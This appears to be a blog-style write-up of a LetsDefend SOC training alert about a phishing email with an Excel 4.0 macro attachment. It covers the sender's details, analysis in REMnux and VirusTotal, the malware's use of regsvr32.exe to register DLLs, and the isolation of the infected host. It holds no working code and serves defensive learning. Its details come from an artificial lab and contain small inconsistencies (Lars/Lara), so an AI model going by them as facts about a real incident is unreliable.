SOC146 – Phishing Mail Detected – Excel 4.0 Macros

Alert! A phishing email has been detected. A summary of the alert is provided. I will retrieve the ticket from the monitoring page and take ownership of the issue.

Investigating

To begin my investigation, I will look at the source of the email. It appears that the email was sent from the address “trenton@tritowncomputers.com.” Furthermore, I have located the email that was sent to Lars.

We can see the details of the email
Source Address: “trenton@tritowncomputers.com
Destination Address: lars@letsdefend.io
Subject: RE: Meeting Notes

To prioritize safety, we need to analyze the attachment through REMnux, a Linux toolkit specifically designed for reverse-engineering and analyzing malicious software. To avoid the possibility of malware, it’s advisable not to open the attachment on our host machine. As a result, we will conduct an investigation into the attachment.

REMnux

I’ve installed Remnux on our VMware Workstation hypervisor. The attachment has been unzipped and you’ll see three files: “iroto1.dll,” “iroto.dll,” and “research-1646684671.xls”. Our next step is to analyze them for any potential indicators of compromise (IOCs).

Virustotal

Based on the VirusTotal analysis, it appears that the attachments are indeed malicious. I will thoroughly review all of the data from VirusTotal and make notes.

Playbook

After completing our initial investigation, we can proceed to begin our playbook.

Based on the virus total results, it is evident that the attachment contained malicious content. Therefore, we will label it as such.

Upon reviewing our ticket summary, it seems that the specified device action was allowed, indicating that the email was successfully delivered to the user.

Let’s check Lara’s workstation to see if there are any signs of the attachment being opened.

I’ve located Lara’s device through our endpoint manager. Now, we can review the terminal and browser history from 06/13/2021.

It seems that Lara has opened the attachment, which has revealed that the malware is utilizing regsvr32.exe to execute and register the DLLs. This procedure adds data to the system’s central directory (Registry), which enables the DLL file to be accessed. Based on our virus total results, we can confirm that the websites that were browsed are connected to the malware.

Containment

We should return to the endpoint manager and isolate this device from the rest of the network.

Now that we have contained the host, let’s finish the playbook.Now that we have contained the host, let’s finish the playbook.